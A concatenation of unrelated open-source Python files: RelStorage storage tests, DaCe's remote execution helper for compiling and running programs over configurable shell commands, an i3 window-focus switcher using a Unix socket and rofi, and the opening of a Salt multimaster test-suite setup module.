assert_that(storage, validly_provides(IBlobStorageRestoreable))
self.assertEqual(storage.isReadOnly(), False)
self.assertEqual(storage.getName(), "xyz")
assert_that(storage.blobhelper, validly_provides(ICachedBlobHelper))
self.assertIn('_External', str(storage.blobhelper.cache_checker))
adapter = storage._adapter
self.assertIsInstance(adapter, self.get_adapter_class())
assert_that(adapter, validly_provides(IRelStorageAdapter))
self.verify_adapter_from_zconfig(adapter)
self.assertEqual(adapter.keep_history, self.keep_history)
if replica_fn:
self.assertEqual(
adapter.connmanager.replica_selector.replica_conf,
replica_fn)
self.assertEqual(storage._options.blob_chunk_size, 10485760)
finally:
db.close()
def checkGeventSwitchesOnOpen(self):
# We make some queries when we open; if the driver is gevent
# capable, that should switch.
driver = self._storage._adapter.driver
if not driver.gevent_cooperative():
raise unittest.SkipTest("Driver %s not gevent capable" % (driver,))
from gevent.util import assert_switches
with assert_switches():
self.open()
#####
# Prefetch Tests
#####
def checkPrefetch(self):
db = DB(self._storage)
conn = db.open()
mapping = conn.root()['key'] = PersistentMapping()
transaction.commit()
item_count = 3
# The new state for the root invalidated the old state,
# and since there is no other connection that might be using it,
# we drop it from the cache.
item_count = 2
self.assertEqual(item_count, len(self._storage._cache))
tid = bytes8_to_int64(mapping._p_serial)
d = self._storage._cache.local_client._cache
self.assertEqual(d[0].max_tid, tid)
self.assertEqual(d[1].max_tid, tid)
self._storage._cache.clear()
self.assertEmpty(self._storage._cache)
conn.prefetch(z64, mapping)
self.assertEqual(2, len(self._storage._cache))
# second time is a no-op
conn.prefetch(z64, mapping)
self.assertEqual(2, len(self._storage._cache))
######
# Parallel Commit Tests
######
@skipIfNoConcurrentWriters
def checkCanVoteAndCommitWhileOtherStorageVotes(self):
storage1 = self._closing(self._storage.new_instance())
storage2 = self._closing(self._storage.new_instance())
# Bring them both into tpc_vote phase. Before parallel commit,
# this would have blocked as the first storage took the commit lock
# in tpc_vote.
txs = {}
for storage in (storage1, storage2):
data = zodb_pickle(MinPO(str(storage)))
t = TransactionMetaData()
txs[storage] = t
storage.tpc_begin(t)
oid = storage.new_oid()
storage.store(oid, None, data, '', t)
storage.tpc_vote(t)
# The order we choose to finish is the order of the returned
# tids.
tid1 = storage2.tpc_finish(txs[storage2])
tid2 = storage1.tpc_finish(txs[storage1])
self.assertGreater(tid2, tid1)
storage1.close()
storage2.close()
def checkCanLoadObjectStateWhileBeingModified(self):
# Get us an object in the database
storage1 = self._closing(self._storage.new_instance())
data = zodb_pickle(MinPO(str(storage1)))
t = TransactionMetaData()
storage1.tpc_begin(t)
oid = storage1.new_oid()
storage1.store(oid, None, data, '', t)
storage1.tpc_vote(t)
initial_tid = storage1.tpc_finish(t)
storage1.release()
del storage1
self._storage._cache.clear(load_persistent=False)
storage1 = self._closing(self._storage.new_instance())
# Get a completely independent storage, not sharing a cache
storage2 = self._closing(self.make_storage(zap=False))
# First storage attempts to modify the oid.
t = TransactionMetaData()
storage1.tpc_begin(t)
storage1.store(oid, initial_tid, data, '', t)
# And locks the row.
storage1.tpc_vote(t)
# storage2 would like to read the old row.
loaded_data, loaded_tid = storage2.load(oid)
self.assertEqual(loaded_data, data)
self.assertEqual(loaded_tid, initial_tid)
# Commit can now happen.
tid2 = storage1.tpc_finish(t)
self.assertGreater(tid2, initial_tid)
storage1.close()
storage2.close()
###
# IStorageCurrentRecordIteration tests
###
def check_record_iternext_basic(self, start_oid_int=None):
# Based on code from FileStorage tests
db = DB(self._storage)
conn = db.open()
conn.root()['abc'] = MinPO('abc')
conn.root()['xyz'] = MinPO('xyz')
transaction.commit()
# Now, add some additional revisions. This proves that we iterate the latest records,
# not all transactions.
conn.root()['abc'].value = 'def'
conn.root()['xyz'].value = 'ghi'
transaction.commit()
conn.close()
storage2 = self._closing(self._storage.new_instance())
# The special case: convert to byte OID
token = None if start_oid_int is None else int64_to_8bytes(start_oid_int)
# (0, 1, 2) by default, or, e.g., (1, 2)
expected_oids = range(start_oid_int or 0, 3)
if not expected_oids:
assert start_oid_int > 3
# Call at least once.
expected_oids = (0,)
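# When start_oid_int is past the last stored OID there is nothing to yield, so the
# single call below is expected to raise StopIteration (see
# check_record_iternext_too_large_oid, which wraps this method in assertRaises).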
record_count = 0
for x in expected_oids:
oid, tid, data, next_token = self._storage.record_iternext(token)
record_count += 1
self.assertEqual(oid, int64_to_8bytes(x))
token = next_token
expected_data, expected_tid = storage2.load(oid)
self.assertEqual(expected_data, data)
self.assertEqual(expected_tid, tid)
if x == 2:
check_token = self.assertIsNone
else:
check_token = self.assertIsNotNone
check_token(token)
self.assertEqual(len(expected_oids), record_count)
def check_record_iternext_token_0(self):
# Passing a starting token.
self.check_record_iternext_basic(0)
def check_record_iternext_token_1(self):
# Gets a subset.
self.check_record_iternext_basic(1)
def check_record_iternext_too_large_oid(self):
with self.assertRaises(StopIteration):
self.check_record_iternext_basic(10)
class AbstractRSZodbConvertTests(StorageCreatingMixin,
FSZODBConvertTests,
# This one isn't cooperative in
# setUp(), so it needs to be last.
ZODB.tests.util.TestCase):
keep_history = True
filestorage_name = 'source'
relstorage_name = 'destination'
filestorage_file = None
def setUp(self):
super(AbstractRSZodbConvertTests, self).setUp()
cfg = """
%%import relstorage
%%import zc.zlibstorage
<zlibstorage %s>
<filestorage>
path %s
</filestorage>
</zlibstorage>
<zlibstorage %s>
<relstorage>
%s
cache-prefix %s
cache-local-dir %s
</relstorage>
</zlibstorage>
""" % (
self.filestorage_name,
self.filestorage_file,
self.relstorage_name,
self.get_adapter_zconfig(),
self.relstorage_name,
os.path.abspath('.'),
)
self._write_cfg(cfg)
self.make_storage(zap=True).close()
def _wrap_storage(self, storage):
return self._closing(ZlibStorage(storage))
def _create_dest_storage(self):
return self._wrap_storage(super(AbstractRSZodbConvertTests, self)._create_dest_storage())
def _create_src_storage(self):
return self._wrap_storage(super(AbstractRSZodbConvertTests, self)._create_src_storage())
def test_new_instance_still_zlib(self):
storage = self._closing(self.make_storage())
new_storage = self._closing(storage.new_instance())
self.assertIsInstance(new_storage,
ZlibStorage)
self.assertIn('_crs_untransform_record_data', storage.base.__dict__)
self.assertIn('_crs_transform_record_data', storage.base.__dict__)
self.assertIn('_crs_untransform_record_data', new_storage.base.__dict__)
self.assertIn('_crs_transform_record_data', new_storage.base.__dict__)
class AbstractRSDestZodbConvertTests(AbstractRSZodbConvertTests):
zap_supported_by_dest = True
@property
def filestorage_file(self):
return self.srcfile
def _create_dest_storage(self):
return self._closing(self.make_storage(cache_prefix=self.relstorage_name, zap=False))
class AbstractRSSrcZodbConvertTests(AbstractRSZodbConvertTests):
filestorage_name = 'destination'
relstorage_name = 'source'
@property
def filestorage_file(self):
return self.destfile
def _create_src_storage(self):
return self._closing(self.make_storage(cache_prefix=self.relstorage_name, zap=False))
class AbstractIDBOptionsTest(unittest.TestCase):
db_options = None
def test_db_options_compliance(self):
from hamcrest import assert_that
from nti.testing.matchers import validly_provides
from relstorage.adapters.interfaces import IDBDriverOptions
from relstorage.adapters.interfaces import IDBDriverFactory
__traceback_info__ = self.db_options
assert_that(self.db_options, validly_provides(IDBDriverOptions))
for factory in self.db_options.known_driver_factories():
assert_that(factory, validly_provides(IDBDriverFactory))
class AbstractIDBDriverTest(unittest.TestCase):
driver = None
def test_db_driver_compliance(self):
from hamcrest import assert_that
from nti.testing.matchers import validly_provides
from relstorage.adapters.interfaces import IDBDriver
__traceback_info__ = self.driver
assert_that(self.driver, validly_provides(IDBDriver))
class DoubleCommitter(Persistent):
"""A crazy persistent class that changes self in __getstate__"""
def __getstate__(self):
if not hasattr(self, 'new_attribute'):
self.new_attribute = 1 # pylint:disable=attribute-defined-outside-init
return Persistent.__getstate__(self)
def _close_and_clean_storage(storage):
try:
storage.close()
storage.cleanup()
except Exception: # pylint:disable=broad-except
pass
class AbstractToFileStorage(RelStorageTestBase):
# Subclass this and set:
# - keep_history = True; and
# - A base class of UndoableRecoveryStorage
#
# or
# - keep_history = False; and
# A base class of BasicRecoveryStorage
# We rely on being placed in a temporary directory by a super
# class that will be cleaned up by tearDown().
def setUp(self):
super(AbstractToFileStorage, self).setUp()
# Use the abspath so that even if we close it after
# we've returned to our original directory (e.g.,
# close is run as part of addCleanup(), which happens after
# tearDown) we don't write index files into the original directory.
self._dst_path = os.path.abspath(self.rs_temp_prefix + 'Dest.fs')
self.__dst = None
@property
def _dst(self):
if self.__dst is None:
self.__dst = FileStorage(self._dst_path, create=True)
# On Windows, though, this could be too late: We can't remove
# files that are still open, and zope.testing.setupstack
# was asked to remove the temp dir as part of tearing itself down;
# cleanups run after tearDown runs (which is when the setupstack runs).
self.addCleanup(_close_and_clean_storage, self.__dst)
return self.__dst
def tearDown(self):
if hasattr(self.__dst, 'close'):
_close_and_clean_storage(self.__dst)
self.__dst = 42 # Not None, so we don't try to create it again.
super(AbstractToFileStorage, self).tearDown()
def new_dest(self):
return self._closing(FileStorage(self._dst_path))
class AbstractFromFileStorage(RelStorageTestBase):
# As for AbstractToFileStorage
def setUp(self):
super(AbstractFromFileStorage, self).setUp()
self._src_path = os.path.abspath(self.rs_temp_prefix + 'Source.fs')
self.__dst = None
def make_storage_to_cache(self):
return FileStorage(self._src_path, create=True)
@property
def _dst(self):
if self.__dst is None:
self.__dst = self.make_storage()
self.addCleanup(_close_and_clean_storage, self.__dst)
return self.__dst
def tearDown(self):
if hasattr(self.__dst, 'close'):
_close_and_clean_storage(self.__dst)
self.__dst = 42 # Not None, so we don't try to create it again.
super(AbstractFromFileStorage, self).tearDown()
def new_dest(self):
return self._dst
|
remote_execution.py
|
# Copyright 2019-2021 ETH Zurich and the DaCe authors. All rights reserved.
import multiprocessing
import os
import sys
import stat
import tempfile
import traceback
import subprocess
import runpy
from typing import List, Callable, Any, AnyStr
from string import Template
from dace.sdfg import SDFG
from dace.codegen.compiler import generate_program_folder, configure_and_compile
from dace.codegen.codegen import CodeObject
from dace.config import Config
def _task(obj):
obj.run()
class FunctionStreamWrapper(object):
""" Class that wraps around a function with a stream-like API (write). """
def __init__(self, *funcs: Callable[[AnyStr], Any]):
self.funcs = funcs
def write(self, *args, **kwargs):
for func in self.funcs:
func(' '.join(args), **kwargs)
def flush(self):
pass
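# Used below to tee interpreter output: sys.stdout/sys.stderr are replaced with a
# FunctionStreamWrapper(show_output, original.write) so the remote client sees the
# output while it still reaches the real streams.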
def _output_feeder(terminal: multiprocessing.Queue, output: AnyStr):
if isinstance(output, str):
# It's already in a usable format
pass
else:
try:
output = output.decode('utf-8')
except UnicodeDecodeError:
# Try again escaping
output = output.decode('unicode_escape')
terminal.put(output)
class Executor(object):
""" DaCe program execution management class for DIODE. """
def __init__(self, remote, async_host=None):
self.counter = 0
self.remote = remote
self.exit_on_error = True
self.running_async = async_host is not None
self.async_host = async_host
self._config = None
self.output_queue = None
def set_exit_on_error(self, do_exit):
self.exit_on_error = do_exit
def set_config(self, config):
self._config = config
def config_get(self, *key_hierarchy):
if self._config is None:
return Config.get(*key_hierarchy)
else:
return self._config.get(*key_hierarchy)
@staticmethod
def _use_mpi(code_objects: List[CodeObject]):
# Figure out whether we should use MPI for launching
for code_object in code_objects:
if code_object.target.target_name == 'mpi':
return True
return False
def run(self, dace_state, fail_on_nonzero=False):
sdfg = dace_state.get_sdfg()
if self.remote:
self.show_output("Executing DaCe program " + sdfg.name + " on " +
self.config_get("execution", "general", "host") + "\n")
self.run_remote(sdfg, dace_state, fail_on_nonzero)
else:
self.show_output("Executing DaCe program " + sdfg.name + " locally\n")
self.run_local(sdfg, dace_state.get_dace_tmpfile())
def run_local(self, sdfg: SDFG, driver_file: str):
workdir = sdfg.build_folder
if Config.get_bool('diode', 'general', 'library_autoexpand'):
sdfg.expand_library_nodes()
code_objects = sdfg.generate_code()
use_mpi = Executor._use_mpi(code_objects)
# TODO: Implement (instead of pyrun, use mpirun/mpiexec)
if use_mpi:
raise NotImplementedError('Running MPI locally unimplemented')
# Pipe stdout/stderr back to client output
stdout = sys.stdout
stderr = sys.stderr
sys.stdout = FunctionStreamWrapper(self.show_output, stdout.write)
sys.stderr = FunctionStreamWrapper(self.show_output, stderr.write)
# Compile SDFG
generate_program_folder(sdfg, code_objects, workdir, self._config)
configure_and_compile(workdir, sdfg.name)
self.show_output("Running script\n")
# Run driver script with the compiled SDFG(s) as the default
old_usecache = Config.get_bool('compiler', 'use_cache')
Config.set('compiler', 'use_cache', value=True)
try:
runpy.run_path(driver_file, run_name='__main__')
# Catching all exceptions, including SystemExit
except (Exception, SystemExit) as ex:
# Corner case: If exited with error code 0, it is a success
if isinstance(ex, SystemExit):
# If the exit code is nonzero, "raise" will not trigger a
# printout on the server
if ex.code != 0:
traceback.print_exc()
raise
else:
raise
self.show_output("Execution Terminated\n")
# Revert configuration and output redirection
Config.set('compiler', 'use_cache', value=old_usecache)
sys.stdout = stdout
sys.stderr = stderr
def run_remote(self, sdfg: SDFG, dace_state, fail_on_nonzero: bool):
dace_progname = sdfg.name
code_objects = sdfg.generate_code()
use_mpi = Executor._use_mpi(code_objects)
remote_workdir = self.config_get("execution", "general", "workdir")
remote_base_path = self.config_get('default_build_folder')
remote_dace_dir = os.path.join(remote_workdir, remote_base_path, dace_progname)
try:
tmpfolder = tempfile.mkdtemp()
generate_program_folder(sdfg, code_objects, tmpfolder, config=self._config)
self.create_remote_directory(remote_dace_dir)
self.copy_folder_to_remote(tmpfolder, remote_dace_dir)
# call compile.py on the remote node in the copied folder
self.remote_compile(remote_dace_dir, dace_progname)
# copy the input file and the .so file (with the right name)
# to remote_dace_dir
so_name = "lib" + dace_progname + "." + self.config_get('compiler', 'library_extension')
self.copy_file_from_remote(os.path.join(remote_dace_dir, 'build', so_name),
os.path.join(tmpfolder, so_name))
self.copy_file_to_remote(os.path.join(tmpfolder, so_name), remote_dace_dir)
dace_file = dace_state.get_dace_tmpfile()
if dace_file is None:
raise ValueError("Dace file is None!")
remote_dace_file = os.path.join(remote_workdir, os.path.basename(dace_file))
self.copy_file_to_remote(dace_file, remote_dace_file)
self.remote_exec_dace(remote_workdir,
remote_dace_file,
use_mpi,
fail_on_nonzero,
repetitions=dace_state.repetitions)
self.show_output("Execution Terminated\n")
try:
self.copy_file_from_remote(remote_workdir + "/results.log", ".")
except RuntimeError:
pass
# Copy back the instrumentation and vectorization results
try:
self.copy_folder_from_remote(os.path.join(remote_dace_dir, 'perf'), ".")
except RuntimeError:
pass
try:
self.remote_delete_file(remote_workdir + "/results.log")
except RuntimeError:
pass
self.remote_delete_file(remote_dace_file)
self.remote_delete_dir(remote_dace_dir)
except: # Running a custom script (the driver file), which can raise
# any exception
self.show_output(traceback.format_exc())
raise
self.counter += 1
def show_output(self, outstr):
""" Displays output of any ongoing compilation or computation. """
if self.output_queue is not None:
# Pipe the output
_output_feeder(self.output_queue, outstr)
return
if isinstance(outstr, str):
print(outstr, end="", flush=True)
return
sys.stdout.buffer.write(outstr)
def remote_delete_file(self, delfile):
s = Template(self.config_get("execution", "general", "execcmd"))
cmd = s.substitute(host=self.config_get("execution", "general", "host"), command="rm " + delfile)
self.exec_cmd_and_show_output(cmd)
def remote_delete_dir(self, deldir):
s = Template(self.config_get("execution", "general", "execcmd"))
cmd = s.substitute(host=self.config_get("execution", "general", "host"), command="rm -r " + deldir)
self.exec_cmd_and_show_output(cmd)
def delete_local_folder(self, path):
os.removedirs(path)
def remote_exec_dace(self,
remote_workdir,
dace_file,
use_mpi=True,
fail_on_nonzero=False,
omp_num_threads=None,
additional_options_dict=None,
repetitions=None):
additional_options_dict = additional_options_dict or {}
run = "${command} "
if use_mpi:
run = self.config_get("execution", "mpi", "mpiexec")
nprocs = self.config_get("execution", "mpi", "num_procs")
else:
nprocs = 1
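# The 'execution.mpi.mpiexec' config value is used as a string.Template below, with
# ${command} and ${num_procs} substituted in; a typical value would look roughly like
# 'mpirun -n ${num_procs} ${command}' (illustrative, not taken from this file).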
repetitions = (repetitions or self.config_get("execution", "general", "repetitions"))
omp_num_threads_str = ""
omp_num_threads_unset_str = ""
perf_instrumentation_result_marker = ""
if omp_num_threads is not None:
omp_num_threads_str = "export OMP_NUM_THREADS=" + str(omp_num_threads) + "\n"
omp_num_threads_unset_str = "unset OMP_NUM_THREADS\n"
perf_instrumentation_result_marker = "echo '# ;%s; Running in multirun config' >> %s/instrumentation_results.txt\n" % (
omp_num_threads_str.replace("\n", ""), remote_workdir)
# Create string from all misc options
miscoptstring = ""
miscoptresetstring = ""
for optkey, optval in additional_options_dict.items():
miscoptstring += "export " + str(optkey) + "=" + str(optval) + "\n"
miscoptresetstring += "unset " + str(optkey) + "\n"
# Create a startscript which exports necessary env-vars
start_sh = "set -x\n" + \
"export DACE_compiler_use_cache=1\n" + \
"export DACE_optimizer_interface=''\n" + \
"export DACE_profiling=1\n" + \
"export DACE_treps=" + str(repetitions) +"\n" + \
miscoptstring + \
omp_num_threads_str + \
"cd " + remote_workdir + "\n" + \
perf_instrumentation_result_marker
s = Template(run + " ")
cmd = s.substitute(command="python3 " + dace_file, num_procs=nprocs)
start_sh += cmd + "\n"
start_sh += "export RETVAL=$?\n"
start_sh += (
"unset DACE_compiler_use_cache\n" + "unset DACE_optimizer_interface\n" + "unset DACE_treps\n" +
"unset DACE_profiling\n" + omp_num_threads_unset_str + miscoptresetstring +
# TODO: separate program error and system error
"exit $RETVAL\n")
tempdir = tempfile.mkdtemp()
startsh_file = os.path.join(tempdir, "start.sh")
fh = open(startsh_file, "w")
fh.write(start_sh)
fh.close()
st = os.stat(startsh_file)
os.chmod(startsh_file, st.st_mode | stat.S_IEXEC)
workdir = self.config_get("execution", "general", "workdir")
self.copy_file_to_remote(startsh_file, self.config_get("execution", "general", "workdir") + "/start.sh")
s = Template(self.config_get("execution", "general", "execcmd"))
cmd = s.substitute(host=self.config_get("execution", "general", "host"), command=workdir + "/start.sh")
self.exec_cmd_and_show_output(cmd, fail_on_nonzero)
self.remote_delete_file(workdir + "/start.sh")
def remote_compile(self, rem_path, dace_progname):
compile_cmd = "python3 -m dace.codegen.compiler " + str(rem_path) + " " + dace_progname
s = Template(self.config_get("execution", "general", "execcmd"))
cmd = s.substitute(host=self.config_get("execution", "general", "host"), command=compile_cmd)
self.exec_cmd_and_show_output(cmd)
def create_remote_directory(self, path):
""" Creates a path on a remote node.
:note: We use `mkdir -p` for now, which is not portable.
"""
mkdircmd = "mkdir -p " + path
s = Template(self.config_get("execution", "general", "execcmd"))
cmd = s.substitute(host=self.config_get("execution", "general", "host"), command=mkdircmd)
self.exec_cmd_and_show_output(cmd)
def copy_file_to_remote(self, src, dst):
s = Template(self.config_get("execution", "general", "copycmd_l2r"))
cmd = s.substitute(host=self.config_get("execution", "general", "host"), srcfile=src, dstfile=dst)
self.exec_cmd_and_show_output(cmd)
def copy_folder_to_remote(self, src, dst):
for root, subdirs, files in os.walk(src):
for filename in files:
file_path = os.path.join(root, filename)
self.copy_file_to_remote(file_path, dst + "/" + filename)
for subdir in subdirs:
self.create_remote_directory(dst + "/" + str(subdir))
self.copy_folder_to_remote(src + "/" + str(subdir), dst + "/" + str(subdir))
return
def copy_folder_from_remote(self, src: str, dst: str):
s = Template(self.config_get("execution", "general", "copycmd_r2l"))
cmd = s.substitute(host=self.config_get("execution", "general", "host"), srcfile="-r " + src, dstfile=dst)
self.exec_cmd_and_show_output(cmd)
def copy_file_from_remote(self, src, dst):
s = Template(self.config_get("execution", "general", "copycmd_r2l"))
cmd = s.substitute(host=self.config_get("execution", "general", "host"), srcfile=src, dstfile=dst)
self.exec_cmd_and_show_output(cmd)
def exec_cmd_and_show_output(self, cmd, fail_on_nonzero=True):
self.show_output(cmd + "\n")
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
while True:
out = p.stdout.read(1)
if out == '' or out == b'':
break
if out != '' and out != b'':
self.show_output(out)
stdout, _ = p.communicate(timeout=60)
self.show_output(stdout)
if p.returncode != 0 and fail_on_nonzero:
print("The command " + cmd + " failed (retcode " +\
str(p.returncode) + ")!\n")
if self.exit_on_error:
os._exit(p.returncode)
else:
raise RuntimeError("The command " + cmd + " failed (retcode " + \
str(p.returncode) + ")!")
class AsyncExecutor:
""" Asynchronous remote execution. """
def __init__(self, remote):
self.executor = Executor(remote)
self.executor.set_exit_on_error(False)
self.to_proc_message_queue = multiprocessing.Queue(128)
self.running_proc = None
# This determines if a "quit"-message stops the subprocess
self.autoquit = True
self.sync_run_lock = multiprocessing.Lock()
def run_sync(self, func):
# Synchronize using a lock
def deferred():
with self.sync_run_lock:
func()
return False
deferred()
def run_async(self, dace_state, fail_on_nonzero=False):
if self.running_proc is not None and self.running_proc.is_alive():
print("Cannot start another sub-process!")
return
# Use multiple processes to handle crashing processes
self.running_proc = multiprocessing.Process(target=_task, args=(self, ))
self.running_proc.start()
self.append_run_async(dace_state, fail_on_nonzero=fail_on_nonzero)
def append_run_async(self, dace_state, fail_on_nonzero=False):
self.to_proc_message_queue.put(("run", (dace_state.dace_code, dace_state.dace_filename, dace_state.source_code,
dace_state.sdfg.to_json(), dace_state.remote), fail_on_nonzero))
def add_async_task(self, task):
self.to_proc_message_queue.put(("execute_task", self, task))
def execute_task(self, task):
return task()
def callMethod(self, obj, name, *args):
# Shortcut for executing a simple task
if name == "execute_task":
_, subargs = args
return self.execute_task(subargs)
elif name == "run":
# Convert arguments back to dace_state, deserializing the SDFG
from diode.DaceState import DaceState
dace_state = DaceState(args[0][0], args[0][1], args[0][2], SDFG.from_json(args[0][3]), args[0][4])
args = (dace_state, *args[1:])
return getattr(obj, name)(*args)
def run(self):
while True:
# Read a message (blocking)
msg = self.to_proc_message_queue.get()
if msg == "quit":
if self.to_proc_message_queue.empty() and self.autoquit:
print("Quitting async execution")
break
else:
# There still is some queued work.
continue
if msg == "forcequit":
break
# Unwrap and call
self.callMethod(self.executor, *msg)
def join(self, timeout=None):
pass
|
i3lasts.py
|
#!/usr/bin/env python3
import os
import socket
import selectors
import threading
from argparse import ArgumentParser
import i3ipc
import dynmen
from shlex import split
import collections
import sys
SOCKET_FILE = '/tmp/i3_focus_last'
MAX_WIN_HISTORY = 15
class FocusWatcher:
def __init__(self):
self.i3 = i3ipc.Connection()
self.i3.on('window::focus', self.on_window_focus)
self.listening_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
if os.path.exists(SOCKET_FILE):
os.remove(SOCKET_FILE)
self.listening_socket.bind(SOCKET_FILE)
self.listening_socket.listen(1)
self.window_list = []
self.window_list_lock = threading.RLock()
def on_window_focus(self, i3conn, event):
with self.window_list_lock:
window_id = event.container.id
if window_id in self.window_list:
self.window_list.remove(window_id)
self.window_list.insert(0, window_id)
if len(self.window_list) > MAX_WIN_HISTORY:
del self.window_list[MAX_WIN_HISTORY:]
def launch_i3(self):
self.i3.main()
def launch_server(self):
selector = selectors.DefaultSelector()
def accept(sock):
conn, addr = sock.accept()
selector.register(conn, selectors.EVENT_READ, read)
def read(conn):
data = conn.recv(1024)
if data == b'switch':
with self.window_list_lock:
tree = self.i3.get_tree()
windows = set(w.id for w in tree.leaves())
coll = []
for win_n, window_id in enumerate(list(self.window_list)):  # iterate a copy; stale ids may be removed below
if window_id not in windows:
self.window_list.remove(window_id)
else:
win = tree.find_by_id(window_id)
coll.append(("w{} d{:<4} | {}".format(win_n, win.workspace().name, win.name),
window_id))
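# self.window_list is most-recently-focused first, so coll[0] is the window that
# currently has focus; coll[1:] is handed to rofi below so that the top menu entry
# (and default selection) is the previously focused window.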
rofi = dynmen.Menu(split('rofi -dmenu -i -p \'> \'') + self.args)
print(coll)
try:
result = rofi(collections.OrderedDict(coll[1:]))
self.i3.command('[con_id=%s] focus' % result.value)
except dynmen.MenuError:
result = None
print("no selection")
elif not data:
selector.unregister(conn)
conn.close()
selector.register(self.listening_socket, selectors.EVENT_READ, accept)
while True:
for key, event in selector.select():
callback = key.data
callback(key.fileobj)
def run(self, args):
self.args = args
t_i3 = threading.Thread(target=self.launch_i3)
t_server = threading.Thread(target=self.launch_server)
for t in (t_i3, t_server):
t.start()
def server():
args = sys.argv[1:]
focus_watcher = FocusWatcher()
focus_watcher.run(args)
def client():
client_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
client_socket.connect(SOCKET_FILE)
client_socket.send(b'switch')
client_socket.close()
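# The server only reacts to the literal payload b'switch' (see read() above); client()
# sends exactly that over SOCKET_FILE. As written, __main__ always starts the server,
# so client() is presumably meant to be invoked separately, e.g. from a keybinding
# wrapper (an assumption; this file does not wire it up).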
if __name__ == '__main__':
server()
|
__init__.py
|
# -*- coding: utf-8 -*-
'''
Set up the Salt multimaster test suite
'''
# Import Python libs
from __future__ import absolute_import, print_function
import copy
import logging
import os
import shutil
import stat
import sys
import threading
import time
from collections import OrderedDict
# Import salt tests support dirs
from tests.support.paths import (
ENGINES_DIR,
FILES,
INTEGRATION_TEST_DIR,
LOG_HANDLERS_DIR,
SCRIPT_DIR,
TMP,
)
from tests.support.runtests import RUNTIME_VARS
from tests.support.parser import PNUM, print_header
from tests.support.processes import start_daemon
# Import Salt libs
from tests.integration import (
SocketServerRequestHandler,
TestDaemon,
TestDaemonStartFailed,
ThreadedSocketServer,
get_unused_localhost_port,
)
import salt.config
import salt.log.setup as salt_log_setup
import salt.utils.path
import salt.utils.platform
from salt.utils.immutabletypes import freeze
from salt.utils.verify import verify_env
# Import salt tests support libs
from tests.support.processes import SaltMaster, SaltMinion
log = logging.getLogger(__name__)
SALT_LOG_PORT = get_unused_localhost_port()
class MultimasterTestDaemon(TestDaemon):
'''
Set up the master and minion daemons, and run related cases
'''
def __enter__(self):
'''
Start a master and minion
'''
# Setup the multiprocessing logging queue listener
salt_log_setup.setup_multiprocessing_logging_listener(
self.mm_master_opts
)
# Set up PATH to mockbin
self._enter_mockbin()
self.master_targets = [self.mm_master_opts, self.mm_sub_master_opts]
self.minion_targets = set(['mm-minion', 'mm-sub-minion'])
if self.parser.options.transport == 'zeromq':
self.start_zeromq_daemons()
elif self.parser.options.transport == 'raet':
self.start_raet_daemons()
elif self.parser.options.transport == 'tcp':
self.start_tcp_daemons()
self.pre_setup_minions()
self.setup_minions()
#if getattr(self.parser.options, 'ssh', False):
#self.prep_ssh()
self.wait_for_minions(time.time(), self.MINIONS_CONNECT_TIMEOUT)
if self.parser.options.sysinfo:
try:
print_header(
'~~~~~~~ Versions Report ', inline=True,
width=getattr(self.parser.options, 'output_columns', PNUM)
)
except TypeError:
print_header('~~~~~~~ Versions Report ', inline=True)
print('\n'.join(salt.version.versions_report()))
try:
print_header(
'~~~~~~~ Minion Grains Information ', inline=True,
width=getattr(self.parser.options, 'output_columns', PNUM)
)
except TypeError:
print_header('~~~~~~~ Minion Grains Information ', inline=True)
grains = self.client.cmd('minion', 'grains.items')
minion_opts = self.mm_minion_opts.copy()
minion_opts['color'] = self.parser.options.no_colors is False
salt.output.display_output(grains, 'grains', minion_opts)
try:
print_header(
'=', sep='=', inline=True,
width=getattr(self.parser.options, 'output_columns', PNUM)
)
except TypeError:
print_header('', sep='=', inline=True)
try:
return self
finally:
self.post_setup_minions()
def __exit__(self, type, value, traceback):
'''
Kill the minion and master processes
'''
try:
if hasattr(self.sub_minion_process, 'terminate'):
self.sub_minion_process.terminate()
else:
log.error('self.sub_minion_process can\'t be terminated.')
except AttributeError:
pass
try:
if hasattr(self.minion_process, 'terminate'):
self.minion_process.terminate()
else:
log.error('self.minion_process can\'t be terminated.')
except AttributeError:
pass
try:
if hasattr(self.sub_master_process, 'terminate'):
self.sub_master_process.terminate()
else:
log.error('self.sub_master_process can\'t be terminated.')
except AttributeError:
pass
try:
if hasattr(self.master_process, 'terminate'):
self.master_process.terminate()
else:
log.error('self.master_process can\'t be terminated.')
except AttributeError:
pass
self._exit_mockbin()
self._exit_ssh()
# Shutdown the multiprocessing logging queue listener
salt_log_setup.shutdown_multiprocessing_logging()
salt_log_setup.shutdown_multiprocessing_logging_listener(daemonizing=True)
# Shutdown the log server
self.log_server.shutdown()
self.log_server.server_close()
self.log_server_process.join()
def start_zeromq_daemons(self):
'''
Fire up the daemons used for zeromq tests
'''
self.log_server = ThreadedSocketServer(('localhost', SALT_LOG_PORT), SocketServerRequestHandler)
self.log_server_process = threading.Thread(target=self.log_server.serve_forever)
self.log_server_process.start()
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting salt-master ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.master_process = start_daemon(
daemon_name='salt-master',
daemon_id=self.mm_master_opts['id'],
daemon_log_prefix='salt-master/{}'.format(self.mm_master_opts['id']),
daemon_cli_script_name='master',
daemon_config=self.mm_master_opts,
daemon_config_dir=RUNTIME_VARS.TMP_MM_CONF_DIR,
daemon_class=SaltMaster,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=120)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting salt-master ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting salt-master ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
# Clone the master key to sub-master's pki dir
for keyfile in ('master.pem', 'master.pub'):
shutil.copyfile(
os.path.join(self.mm_master_opts['pki_dir'], keyfile),
os.path.join(self.mm_sub_master_opts['pki_dir'], keyfile)
)
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting second salt-master ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.sub_master_process = start_daemon(
daemon_name='sub salt-master',
